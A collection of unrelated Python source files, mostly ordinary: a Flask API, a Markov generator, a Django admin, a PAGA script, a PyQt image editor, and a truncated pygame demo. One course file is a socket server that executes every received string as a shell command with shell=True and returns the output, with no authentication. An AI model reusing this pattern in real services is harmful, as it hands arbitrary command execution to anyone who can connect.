+{"seq_id":"372786888","text":"#!/usr/bin/python3\n\"\"\" returns a JSON object \"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import jsonify, request\nfrom models import storage\n\n\n@app_views.route('/status', methods=['GET'])\ndef status():\n \"\"\" return a json status \"\"\"\n if request.method == 'GET':\n return jsonify({\"status\": \"OK\"})\n\n\n@app_views.route('/stats', methods=['GET'])\ndef stats():\n \"\"\" retrieves the number of eacj object by type \"\"\"\n if request.method == 'GET':\n res = {}\n classes = {\"Amenity\": \"amenities\", \"City\": \"cities\", \"Place\": \"places\",\n \"Review\": \"reviews\", \"State\": \"states\", \"User\": \"users\"}\n for k, v in classes.items():\n res[v] = storage.count(k)\n return jsonify(res)\n","sub_path":"api/v1/views/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"588167427","text":"#!/usr/bin/env python\n\n# Markov text generator, [markov.py](python/markov.py). This program should be called from the command line with two arguments: the name of a file containing text to read, and the number of words to generate. For example, if `chains.txt` contains the short story by Frigyes Karinthy, we could run:\n\n# ```bash\n# ./markov.py chains.txt 40\n# ```\n\n#I wrote this chatbot using this link: http://stackoverflow.com/questions/5306729/how-do-markov-chain-chatbots-work\n\nimport random\nimport re\nimport string\nimport sys\n\ntext = str(sys.argv[1]) #text to read\ntotal_words = int(sys.argv[2]) #maximum words?\n\n\nlinestring = open(text, 'r').read()\nlinestring = re.sub(r\"\\n\", \" \", linestring) #get rid of new lines\nlinestring = re.sub(r\"\\\"\", \"\", linestring) #get rid of quotation marks\nwords=linestring.split()\n\n\n#generate key/value pairs of phrases of a given length and the words that follow those phrases\nnum_of_words=2\nword_dict=dict()\n\nfor i in range(len(words)-num_of_words):\n phrase = ' '.join([words[j] for j in range(i, i+num_of_words)])\n if phrase not in word_dict:\n word_dict[phrase]=[words[i+num_of_words]]\n else:\n word_dict[phrase] = word_dict[phrase]+[words[i+num_of_words]]\n\n#pick a random key value to start with\nstarting_phrase = random.choice(list(word_dict.keys()))\nrand_num = random.randint(0, len(word_dict[starting_phrase]) - 1)\nwords = ' '.join([starting_phrase.capitalize(), word_dict[starting_phrase][rand_num]])\nstarting_phrase =starting_phrase.split()[1] + ' ' + word_dict[starting_phrase][rand_num]\n\n#run chat_bot\ncount = num_of_words\nwhile count < total_words:\n try:\n rand_num = random.randint(0, len(word_dict[starting_phrase]) - 1)\n words = ' '.join([words, word_dict[starting_phrase][rand_num]])\n starting_phrase = starting_phrase.split()[1] + ' ' + word_dict[starting_phrase][rand_num]\n except:\n if words[-1] not in string.punctuation: #if we run out of pairs but it isn't the end of a line, make it the end of a sentence.\n words = ''.join([words, '.'])\n starting_phrase = random.choice(list(word_dict.keys())) #generate a new phrase to start a new sentence\n words = ' '.join([words, starting_phrase.capitalize()])\n\n count=count+1\n\n\nprint(re.search(r'(\\A.*)\\..+',words).group(1)+'.') #remove any sentence fragments at the end","sub_path":"python/markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"243001160","text":"from socket import AF_INET, SOCK_STREAM, socket\nimport subprocess\n\nserver = socket(AF_INET, SOCK_STREAM)\nserver.bind(('127.0.0.1', 8090))\nserver.listen(5)\n\nwhile True:\n print('starting...')\n conn, client_addr = server.accept()\n print(client_addr)\n\n while True:\n try:\n cmd = conn.recv(1024)\n if not cmd:\n break\n obj = subprocess.Popen(cmd.decode('utf-8'), shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n )\n stdout = obj.stdout.read()\n stderr = obj.stderr.read()\n\n conn.send(stdout+stderr)\n except ConnectionResetError:\n break\n\n conn.close()\nserver.close()\n","sub_path":"course/ssh通信/服务端.py","file_name":"服务端.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"425433792","text":"num1 = float(input(\"Please enter the first number: \"))\nnum2 = float(input(\"Please enter the second number: \"))\noper = input(\"Please choose your operation:(add, subtract, multiply, division)\")\nadd = lambda x, y: x + y\nsub = lambda x, y: x - y\nmul = lambda x, y: x * y\ndiv = lambda x, y: x / y\nif oper == 'add':\n ans = add(num1, num2)\nelif oper == 'subtract':\n ans = sub(num1, num2)\nelif oper == 'multiply':\n ans = mul(num1, num2)\nelif oper == 'division':\n ans = div(num1, num2)\nelse:\n print(\"Operation not recognized\")\nprint(\"The answer is: \" + str(ans))\n","sub_path":"Practice-11-1-Calculator_Simp.py","file_name":"Practice-11-1-Calculator_Simp.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"151837923","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom .forms import CustomUserChangeForm\nfrom .forms import CustomUserCreationForm\nfrom .models import CustomUser\nfrom .models import Profile\n\n\nclass ProfileInline(admin.StackedInline):\n model = Profile\n can_delete = False\n verbose_name_plural = 'Profile'\n fk_name = 'user'\n\n\n@admin.register(CustomUser)\nclass CustomUserAdmin(UserAdmin):\n inlines = (ProfileInline, )\n list_display = (\n 'username',\n 'get_account_status',\n 'get_scw_username',\n 'get_shibboleth_username',\n 'get_institution',\n 'is_staff',\n )\n list_select_related = ('profile', )\n model = CustomUser\n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n\n def get_account_status(self, instance):\n return Profile.STATUS_CHOICES[instance.profile.account_status - 1][1]\n\n get_account_status.short_description = 'Account Status'\n\n def get_shibboleth_username(self, instance):\n return instance.profile.shibboleth_username\n\n get_shibboleth_username.short_description = 'Shibboleth Username'\n\n def get_scw_username(self, instance):\n return instance.profile.scw_username\n\n get_scw_username.short_description = 'SCW Username'\n\n def get_institution(self, instance):\n return instance.profile.institution\n\n get_institution.short_description = 'Institution'\n\n def get_inline_instance(self, request, obj=None):\n if not obj:\n return list()\n return super(CustomUserAdmin, self).get_inline_instance(request, obj)\n","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"54083701","text":"#!/usr/local/bin/python\n\n# avoid errors due to no $DISPLAY environment variable available when running sc.pl.paga\nimport matplotlib\nmatplotlib.use('Agg')\n\nimport pandas as pd\nimport numpy as np\nimport h5py\nimport json\n\nimport scanpy.api as sc\nimport anndata\nimport numba\nimport warnings\n\nimport time\ncheckpoints = {}\n\nimport dynclipy\n\n# ____________________________________________________________________________\n# Load data ####\ntask = dynclipy.main()\n\ncounts = task[\"counts\"]\n\nparameters = task[\"parameters\"]\n\nstart_id = task[\"priors\"][\"start_id\"]\nif isinstance(start_id, list):\n start_id = start_id[0]\n\nif \"groups_id\" in task[\"priors\"]:\n groups_id = task[\"priors\"]['groups_id']\nelse:\n groups_id = None\n\n# create dataset\nif groups_id is not None:\n obs = pd.DataFrame(groups_id)\n obs.index = groups_id[\"cell_id\"]\n obs[\"louvain\"] = obs[\"group_id\"].astype(\"category\")\n adata = anndata.AnnData(counts)\n adata.obs = obs\nelse:\n adata = anndata.AnnData(counts)\n\ncheckpoints[\"method_afterpreproc\"] = time.time()\n\n# ____________________________________________________________________________\n# Basic preprocessing ####\n\n# normalisation & filtering\nif counts.shape[1] < 100 and parameters[\"filter_features\"]:\n print(\"You have less than 100 features, but the filter_features parameter is true. This will likely result in an error. Disable filter_features to avoid this\")\n\nif parameters[\"filter_features\"]:\n n_top_genes = min(2000, counts.shape[1])\n sc.pp.recipe_zheng17(adata, n_top_genes=n_top_genes)\n\n# precalculating some dimensionality reductions\nsc.tl.pca(adata, n_comps=parameters[\"n_comps\"])\nwith warnings.catch_warnings():\n warnings.simplefilter('ignore', numba.errors.NumbaDeprecationWarning)\n sc.pp.neighbors(adata, n_neighbors=parameters[\"n_neighbors\"])\n\n# denoise the graph by recomputing it in the first few diffusion components\nif parameters[\"n_dcs\"] != 0:\n sc.tl.diffmap(adata, n_comps=parameters[\"n_dcs\"])\n\n# ____________________________________________________________________________\n# Cluster, infer trajectory, infer pseudotime, compute dimension reduction ###\n\n# add grouping if not provided\nif groups_id is None:\n sc.tl.louvain(adata, resolution=parameters[\"resolution\"])\n\n# run paga\nsc.tl.paga(adata)\n\n# compute a layout for the paga graph\n# - this simply uses a Fruchterman-Reingold layout, a tree layout or any other\n# popular graph layout is also possible\n# - to obtain a clean visual representation, one can discard low-confidence edges\n# using the parameter threshold\nsc.pl.paga(adata, threshold=0.01, layout='fr', show=False)\n\n# run dpt for pseudotime information that is overlayed with paga\nadata.uns['iroot'] = np.where(adata.obs.index == start_id)[0][0]\nif parameters[\"n_dcs\"] == 0:\n sc.tl.diffmap(adata)\nsc.tl.dpt(adata, n_dcs = min(adata.obsm.X_diffmap.shape[1], 10))\n\n# run umap for a dimension-reduced embedding, use the positions of the paga\n# graph to initialize this embedding\nif parameters[\"embedding_type\"] == 'umap':\n sc.tl.umap(adata, init_pos='paga')\n dimred_name = 'X_umap'\nelse:\n sc.tl.draw_graph(adata, init_pos='paga')\n dimred_name = \"X_draw_graph_\" + parameters[\"embedding_type\"]\n\ncheckpoints[\"method_aftermethod\"] = time.time()\n\n# ____________________________________________________________________________\n# Process & save output ####\n\n# grouping\ngrouping = pd.DataFrame({\"cell_id\": adata.obs.index, \"group_id\": adata.obs.louvain})\n\n# milestone networks\nmilestone_network = pd.DataFrame(\n adata.uns[\"paga\"][\"connectivities_tree\"].todense(),\n index=adata.obs.louvain.cat.categories,\n columns=adata.obs.louvain.cat.categories\n).stack().reset_index()\nmilestone_network.columns = [\"from\", \"to\", \"length\"]\nmilestone_network = milestone_network.query(\"length > 0\").reset_index(drop=True)\nmilestone_network[\"directed\"] = False\n\n# dimred\ndimred = pd.DataFrame([x for x in adata.obsm[dimred_name].T]).T\ndimred.columns = [\"comp_\" + str(i+1) for i in range(dimred.shape[1])]\ndimred[\"cell_id\"] = adata.obs.index\n\n# branch progressions: the scaled dpt_pseudotime within every cluster\nbranch_progressions = adata.obs\nbranch_progressions[\"dpt_pseudotime\"] = branch_progressions[\"dpt_pseudotime\"].replace([np.inf, -np.inf], 1) # replace unreachable pseudotime with maximal pseudotime\nbranch_progressions[\"percentage\"] = branch_progressions.groupby(\"louvain\")[\"dpt_pseudotime\"].apply(lambda x: (x-x.min())/(x.max() - x.min())).fillna(0.5)\nbranch_progressions[\"cell_id\"] = adata.obs.index\nbranch_progressions[\"branch_id\"] = branch_progressions[\"louvain\"].astype(np.str)\nbranch_progressions = branch_progressions[[\"cell_id\", \"branch_id\", \"percentage\"]]\n\n# branches:\n# - length = difference between max and min dpt_pseudotime within every cluster\n# - directed = not yet correctly inferred\nbranches = adata.obs.groupby(\"louvain\").apply(lambda x: x[\"dpt_pseudotime\"].max() - x[\"dpt_pseudotime\"].min()).reset_index()\nbranches.columns = [\"branch_id\", \"length\"]\nbranches[\"branch_id\"] = branches[\"branch_id\"].astype(np.str)\nbranches[\"directed\"] = True\n\n# branch network: determine order of from and to based on difference in average pseudotime\nbranch_network = milestone_network[[\"from\", \"to\"]]\naverage_pseudotime = adata.obs.groupby(\"louvain\")[\"dpt_pseudotime\"].mean()\nfor i, (branch_from, branch_to) in enumerate(zip(branch_network[\"from\"], branch_network[\"to\"])):\n if average_pseudotime[branch_from] > average_pseudotime[branch_to]:\n branch_network.at[i, \"to\"] = branch_from\n branch_network.at[i, \"from\"] = branch_to\n\n# save\ndataset = dynclipy.wrap_data(cell_ids = adata.obs.index)\ndataset.add_branch_trajectory(\n grouping = grouping,\n branch_progressions = branch_progressions,\n branches = branches,\n branch_network = branch_network\n)\ndataset.add_dimred(dimred = dimred)\ndataset.add_timings(checkpoints)\n\ndataset.write_output(task[\"output\"])\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"404033456","text":"import sys\nimport cv2\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QMessageBox\nfrom PyQt5.QtPrintSupport import QPrintDialog, QPrinter\nfrom PyQt5.uic import loadUi\nimport numpy as np\nfrom scipy import ndimage\nimport scipy as sp\n\n\nclass LoadQt(QMainWindow):\n def __init__(self):\n super(LoadQt, self).__init__()\n loadUi('demo.ui', self)\n self.setWindowIcon(QtGui.QIcon(\"python-icon.png\"))\n\n self.image = None\n self.actionOpen.triggered.connect(self.open_img)\n self.actionSave.triggered.connect(self.save_img)\n self.actionPrint.triggered.connect(self.createPrintDialog)\n self.actionQuit.triggered.connect(self.QuestionMessage)\n self.actionBig.triggered.connect(self.big_Img)\n self.actionSmall.triggered.connect(self.small_Img)\n self.actionQt.triggered.connect(self.AboutMessage)\n self.actionAuthor.triggered.connect(self.AboutMessage2)\n\n #Chương 2\n self.actionRotation.triggered.connect(self.rotation)\n self.actionAffine.triggered.connect(self.affine)\n\n #Chương 3\n self.actioAnhXam.triggered.connect(self.anh_Xam)\n self.actionNegative.triggered.connect(self.anh_Negative)\n self.actionHistogram.triggered.connect(self.histogram_Equalization)\n self.actionLog.triggered.connect(self.Log)\n self.actionGamma.triggered.connect(self.gamma)\n\n #Chương 4\n self.actionGaussan.triggered.connect(self.Gaussian)\n self.actionHigh_Boost.triggered.connect(self.High_Boost)\n self.actionLaplacian.triggered.connect(self.Laplacian)\n self.actionFilter_Average.triggered.connect(self.filter_Average)\n self.actionUnsharp.triggered.connect(self.Unsharp)\n\n #Chương 5\n self.actionTanSo.triggered.connect(self.Tan_so)\n self.actionIdeal_LPF.triggered.connect(self.imidlp)\n self.actionGaussian_HPF.triggered.connect(self.Gaussian_HighPass)\n #self.actionButterworth_HPF.triggered.connect(self.Butterworth_HighPass)\n\n #Chương 7\n self.actionDilate.triggered.connect(self.dilate)\n self.actionErode.triggered.connect(self.erode)\n self.actionOpen_2.triggered.connect(self.open)\n self.actionClose.triggered.connect(self.close_)\n self.actionHit_miss.triggered.connect(self.hitmis)#Lỗi\n self.actionGradient.triggered.connect(self.gradient)\n self.actionMorboundary.triggered.connect(self.morboundary)\n self.actionConvex.triggered.connect(self.convex)\n\n #Chương 8\n self.actionx_direcction_Sobel.triggered.connect(self.x_Sobel)\n self.actiony_direction_Sobel.triggered.connect(self.y_Sobel)\n self.actionLaplacian_2.triggered.connect(self.sobel_Laplacian)\n self.actionLaplacian_of_Gaussian.triggered.connect(self.lap_of_Gaussian)\n self.actionCanny.triggered.connect(self.img_Canny)\n\n #Set input\n self.dial.valueChanged.connect(self.rotation)\n self.horizontalSlider.valueChanged.connect(self.Gamma_)\n self.size_Img.valueChanged.connect(self.big_Img)\n self.gaussian_QSlider.valueChanged.connect(self.Gaussian)\n self.erosion.valueChanged.connect(self.HinhThai)\n\n self.gray.stateChanged.connect(self.anh_Xam)\n\n self.hist.stateChanged.connect(self.histogram_Equalization)\n\n self.Qlog.valueChanged.connect(self.Log)\n\n self.sobel.stateChanged.connect(self.Sobel)\n self.sobel_x.stateChanged.connect(self.Sobel)\n self.sobel_y.stateChanged.connect(self.Sobel)\n\n self.cbLog.stateChanged.connect(self.Log)\n\n self.cbLap.stateChanged.connect(self.Laplacian)\n\n self.canny.stateChanged.connect(self.Canny)\n self.canny_min.valueChanged.connect(self.Canny)\n self.canny_max.valueChanged.connect(self.Canny)\n\n self.pushButton.clicked.connect(self.reset)\n\n @pyqtSlot()\n def loadImage(self, fname):\n self.image = cv2.imread(fname)\n self.tmp = self.image\n self.displayImage()\n\n def displayImage(self, window=1):\n qformat = QImage.Format_Indexed8\n\n if len(self.image.shape) == 3:\n if(self.image.shape[2]) == 4:\n qformat = QImage.Format_RGBA8888\n else:\n qformat = QImage.Format_RGB888\n img = QImage(self.image, self.image.shape[1], self.image.shape[0], self.image.strides[0], qformat)\n #BGR > RGB\n img = img.rgbSwapped()\n if window == 1:\n self.imgLabel.setPixmap(QPixmap.fromImage(img))\n self.imgLabel.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)\n if window == 2:\n self.imgLabel2.setPixmap(QPixmap.fromImage(img))\n self.imgLabel2.setAlignment(QtCore.Qt.AlignHCenter | QtCore.Qt.AlignVCenter)\n\n def open_img(self):\n fname, filter = QFileDialog.getOpenFileName(self, 'Open File', 'C:\\\\Users\\DELL\\PycharmProjects\\DemoPro', \"Image Files (*)\")\n if fname:\n self.loadImage(fname)\n else:\n print(\"Invalid Image\")\n\n def save_img(self):\n fname, filter = QFileDialog.getSaveFileName(self, 'Save File', 'C:\\\\', \"Image Files (*.png)\")\n if fname:\n cv2.imwrite(fname, self.image)\n else:\n print(\"Error\")\n\n def createPrintDialog(self):\n printer = QPrinter(QPrinter.HighResolution)\n dialog = QPrintDialog(printer, self)\n\n if dialog.exec_() == QPrintDialog.Accepted:\n self.imgLabel2.print_(printer)\n\n def big_Img(self):\n self.image = cv2.resize(self.image, None, fx=1.5, fy=1.5, interpolation=cv2.INTER_CUBIC)\n self.displayImage(2)\n\n def small_Img(self):\n self.image = cv2.resize(self.image, None, fx=0.75, fy=0.75, interpolation=cv2.INTER_CUBIC)\n self.displayImage(2)\n\n def reset(self):\n self.image = self.tmp\n self.displayImage(2)\n\n def AboutMessage(self):\n QMessageBox.about(self, \"About Qt - Qt Designer\", \"This is program uses Qt version 5.11.1.\")\n def AboutMessage2(self):\n QMessageBox.about(self, \"About Author\", \"Trịnh Hoàng Huy & Nguyễn Minh Hiếu Bốn\")\n\n def QuestionMessage(self):\n message = QMessageBox.question(self, \"Exit\", \"Bạn có chắc muốn thoát\", QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if message == QMessageBox.Yes:\n print(\"Yes\")\n self.close()\n else:\n print(\"No\")\n\n ################# Chương 2 ##############################################################################\n def rotation(self):\n rows, cols, steps = self.image.shape\n M = cv2.getRotationMatrix2D((cols / 2, rows / 2), 90, 1)\n self.image = cv2.warpAffine(self.image, M, (cols, rows))\n self.displayImage(2)\n\n def affine(self):\n self.image = self.tmp\n rows, cols, ch = self.image.shape\n pts1 = np.float32([[50, 50], [200, 50], [50, 200]])\n pts2 = np.float32([[10, 100], [200, 50], [100, 250]])\n\n M = cv2.getAffineTransform(pts1, pts2)\n self.image = cv2.warpAffine(self.image, M, (cols, rows))\n\n self.displayImage(2)\n\n ################# Chương 3 ##############################################################################\n def anh_Xam(self):\n self.image = self.tmp\n self.image = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.displayImage(2)\n\n def anh_Negative(self):\n self.image = self.tmp\n self.image = ~self.image\n self.displayImage(2)\n\n def histogram_Equalization(self):\n self.image = self.tmp\n img_yuv = cv2.cvtColor(self.image, cv2.COLOR_RGB2YUV)\n img_yuv[:, :, 0] = cv2.equalizeHist(img_yuv[:, :, 0])\n self.image = cv2.cvtColor(img_yuv, cv2.COLOR_YUV2RGB)\n self.displayImage(2)\n\n def Log(self):\n self.image = self.tmp\n img_2 = np.uint8(np.log(self.image))\n c = 2\n self.image = cv2.threshold(img_2, c, 225, cv2.THRESH_BINARY)[1]\n self.displayImage(2)\n\n def Gamma_(self, gamma):\n self.image = self.tmp\n gamma = gamma*0.1\n invGamma = 1.0 /gamma\n table = np.array([((i / 255.0) ** invGamma) * 255\n for i in np.arange(0, 256)]).astype(\"uint8\")\n\n self.image = cv2.LUT(self.image, table)\n self.displayImage(2)\n\n def gamma(self, gamma):\n self.image = self.tmp\n gamma = 1.5\n invGamma = 1.0 / gamma\n table = np.array([((i / 255.0) ** invGamma) * 255\n for i in np.arange(0, 256)]).astype(\"uint8\")\n\n self.image = cv2.LUT(self.image, table)\n self.displayImage(2)\n\n ################# Chương 4 ##############################################################################\n def Gaussian(self):\n self.image = self.tmp\n self.image = cv2.GaussianBlur(self.image, (5, 5), 2)\n self.displayImage(2)\n\n def High_Boost(self):\n self.image = self.tmp\n x = np.array([[-1, -1, -1], [-1, 8, -1], [-1, -1, -1]])\n self.image = cv2.filter2D(np.array(self.image), -1, x)\n self.displayImage(2)\n\n def Laplacian(self):\n self.image = self.tmp\n h = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])\n self.image = cv2.filter2D(np.array(self.image), -1, h)\n self.displayImage(2)\n\n def filter_Average(self):\n self.image = self.tmp\n self.image = cv2.medianBlur(self.image, 5)\n self.displayImage(2)\n\n def Unsharp(self):\n self.image = self.tmp\n gau = cv2.GaussianBlur(self.image, (9, 9), 10.0)\n self.image = cv2.addWeighted(self.image, 1.5, gau, -0.5, 0, self.image)\n self.displayImage(2)\n\n ################# Chương 5 ##############################################################################\n def Tan_so(self):\n self.image = self.tmp\n img_float32 = np.float32(self.image)\n dft = cv2.dft(img_float32, flags=cv2.DFT_COMPLEX_OUTPUT)\n dft_shift = np.fft.fftshift(dft)\n self.image = 20 * np.log(cv2.magnitude(dft_shift[:, :, 0], dft_shift[:, :, 1]))\n self.displayImage(2)\n\n def Ideal_LPF(self,sx, sy, d0):\n hr =(sx) / 2\n hc =(sy) / 2\n\n x = np.arange(-hc, hc)\n y = np.arange(-hr, hr)\n\n [x, y] = np.meshgrid(x, y)\n\n mg = np.sqrt(x ** 2 + y ** 2)\n return np.double(mg <= d0)\n\n def imidlp(self):\n self.image = self.tmp\n print(1)\n height, width, channels = self.image\n H = self.Ideal_LPF(height, width, d0=30)\n print(3)\n G = np.fft.fftshift(np.fft.fft2(self.image))\n print(4)\n Ip = G\n print(5)\n if len(G.shape) == 3:\n print(6)\n Ip[:, :, 0] = G[:, :, 0] = H\n Ip[:, :, 1] = G[:, :, 1] = H\n Ip[:, :, 2] = G[:, :, 2] = H\n else:\n print(7)\n Ip = G * H\n print(8)\n self.image = np.abs(np.fft.ifft2(np.fft.fftshift(Ip)), np.uint8)\n print(9)\n self.displayImage(2)\n print(10)\n\n '''def Butterworth_HighPass(self):\n self.image = self.tmp\n # desired RMS\n rms = 0.2\n raw1 = self.image / np.std(self.image)\n print(1)\n # make the standard deviation to be the desired RMS\n raw2 = raw1 * rms\n print(2)\n # convert to frequency domain\n img_freq = np.fft.fft2(raw2)\n print(3)\n hp_filt = psychopy.filters.butter2d_hp(size=self.image.shape, cutoff=0.05, n=10)\n print(4)\n img_filt = np.fft.fftshift(img_freq) * hp_filt\n print(5)\n img_new = np.real(np.fft.ifft2(np.fft.ifftshift(img_filt)))\n print(6)\n self.image = img_new\n\n self.displayImage(2)'''\n\n def Gaussian_HighPass(self):\n self.image = self.tmp\n data = np.array(self.image, dtype=float)\n lowpass = ndimage.gaussian_filter(data, 50)\n gauss_highpass = data - lowpass\n gauss_highpass = np.uint8(gauss_highpass)\n self.image = ~gauss_highpass\n\n self.displayImage(2)\n\n ################# Chương 7 ##############################################################################\n def dilate(self):\n self.image = self.tmp\n kernel = np.ones((2, 6), np.uint8)\n self.image = cv2.dilate(self.image, kernel, iterations=3)\n self.displayImage(2)\n\n def erode(self):\n self.image = self.tmp\n kernel = np.ones((4, 7), np.uint8)\n self.image = cv2.erode(self.tmp, kernel, iterations=3)\n self.displayImage(2)\n\n def HinhThai(self , iter):\n self.image = self.tmp\n if iter > 0 :\n kernel = np.ones((4, 7), np.uint8)\n self.image = cv2.erode(self.tmp, kernel, iterations=iter)\n else :\n kernel = np.ones((2, 6), np.uint8)\n self.image = cv2.dilate(self.image, kernel, iterations=iter*-1)\n self.displayImage(2)\n\n def open(self):\n self.image = self.tmp\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))\n self.image = cv2.morphologyEx(self.image, cv2.MORPH_OPEN, kernel)\n self.displayImage(2)\n\n def close_(self):\n self.image = self.tmp\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))\n self.image = cv2.morphologyEx(self.image, cv2.MORPH_CLOSE, kernel)\n self.displayImage(2)\n\n #Lỗi\n def hitmis(self):\n self.image = self.tmp\n kernel = np.array(([0, 1, 0], [1, -1, 1], [0, 1, 0]))\n self.image = cv2.morphologyEx(self.image, cv2.MORPH_HITMISS, kernel)\n print(3)\n self.displayImage(2)\n print(4)\n\n def gradient(self):\n self.image = self.tmp\n kernel = np.ones((5, 5), np.uint8)\n self.image = cv2.morphologyEx(self.image, cv2.MORPH_GRADIENT, kernel)\n self.displayImage(2)\n\n def morboundary(self):\n self.image = self.tmp\n se = np.ones((3, 3), np.uint8)\n e1 = self.image - cv2.erode(self.image, se, iterations=1)\n self.image = e1\n self.displayImage(2)\n\n def convex(self):\n self.image = self.tmp\n self.image = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n blur = cv2.blur(self.image, (3, 3))\n ret, thresh = cv2.threshold(blur, 50, 255, cv2.THRESH_BINARY)\n\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n hull = []\n\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull.append(cv2.convexHull(contours[i], False))\n\n # create an empty black image\n self.image = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\n # draw contours and hull points\n for i in range(len(contours)):\n color_contours = (0, 255, 0) # green - color for contours\n color = (255, 0, 0) # blue - color for convex hull\n # draw ith contour\n #cv2.drawContours( self.image, contours, i, color_contours, 1, 8, hierarchy)\n # draw ith convex hull object\n cv2.drawContours( self.image, hull, i, color, 1, 8)\n self.displayImage(2)\n\n ################# Chương 8 ##############################################################################\n def Sobel(self):\n if self.sobel.isChecked():\n self.image = self.tmp\n if self.sobel_x.isChecked():\n self.image = cv2.Sobel(self.image, cv2.CV_8U, 1, 0, ksize=5)\n if self.sobel_y.isChecked():\n self.image = cv2.Sobel(self.image, cv2.CV_8U, 0, 1, ksize=5)\n self.displayImage(2)\n def x_Sobel(self):\n self.image = self.tmp\n im = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Sobel(im, cv2.CV_8U, 1, 0, ksize=5)\n\n self.displayImage(2)\n\n def y_Sobel(self):\n self.image = self.tmp\n im = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Sobel(im, cv2.CV_8U, 0, 1, ksize=5)\n\n self.displayImage(2)\n\n def sobel_Laplacian(self):\n self.image = self.tmp\n im = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Laplacian(im, cv2.CV_8U)\n\n self.displayImage(2)\n\n def lap_of_Gaussian(self):\n self.image = self.tmp\n im = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n blur = cv2.GaussianBlur(im, (5, 5), 0)\n self.image = cv2.Laplacian(blur, cv2.CV_8U, ksize=5)\n\n self.displayImage(2)\n\n def img_Canny(self):\n self.image = self.tmp\n can = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Canny(can, 100, 200)\n self.displayImage(2)\n\n def Canny(self):\n self.image = self.tmp\n if self.canny.isChecked():\n can = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)\n self.image = cv2.Canny(can, self.canny_min.value(), self.canny_max.value())\n self.displayImage(2)\n\napp = QApplication(sys.argv)\nwin = LoadQt()\nwin.show()\nsys.exit(app.exec())\n\n","sub_path":"Pyqt5ui.py","file_name":"Pyqt5ui.py","file_ext":"py","file_size_in_byte":17207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626401906","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 05 08:07:25 2018\r\n\r\n@author: quillot/costa\r\n\"\"\"\r\n\r\nimport pygame as pg\r\nimport datetime\r\n#initialisation de Pygame\r\npg.init()\r\n#création de la fenêtre d'affichage\r\nscreen = pg.display.set_mode((800,250))\r\n#création des rectangles : boutons et segments\r\ns0 = pg.Rect(370,25,360,75)\r\nb0 = pg.Rect(50,15,200,25)\r\nb1 = pg.Rect(50,65,200,25)\r\nb2 = pg.Rect(50,115,200,25)\r\nb3 = pg.Rect(50,165,200,25)\r\nb4 = pg.Rect(50,215,200,25)\r\n#mise des rectangles dans des listes et état des rectangles : allumés ou éteints\r\nrects = [s0,b0,b1,b2,b3,b4]\r\nbuttons = [b0,b1,b2,b3,b4]\r\n#initialisation de la police pour l'affichage de texte et liste de texte à ajouter sur les boutons\r\nmyfont = pg.font.SysFont(\"monospace\", 20)\r\nlabels = [\"Start\",\"Power\",\"Stop\",\"Plus\",\"Moins\"]\r\ni = 0\r\npg.draw.rect(screen,(0,174,0),b0)\r\npg.draw.rect(screen,(237,255,0),b1)\r\npg.draw.rect(screen,(255,0,0),b2)\r\npg.draw.rect(screen,(237,255,0),b3)\r\npg.draw.rect(screen,(237,255,0),b4)\r\n#Affichage des boutons et reinitialisation de leur état à éteint \r\ni = 0\r\nfor text in labels:\r\n label = myfont.render(text,1,(0,0,0))\r\n screen.blit(label,(130,17+i*50))\r\n i+=1\r\n\r\nrunning=1\r\nnb=10\r\netat=0\r\nwhile running:\r\n #Detection des évenèments utilisateurs \r\n for event in pg.event.get():\r\n if event.type == pg.KEYDOWN:\t\t\t\r\n print(event)\r\n if event.key == pg.K_ESCAPE:\r\n running = 0 \r\n pg.quit()\r\n #Enregistrement des coordonnées de la souris si il y a eu un clique \r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n mcoords = pg.mouse.get_pos()\r\n #création d'un mini rect 1x1 à cet emplacement puis test de collision avec les boutons\r\n mouse_rect = 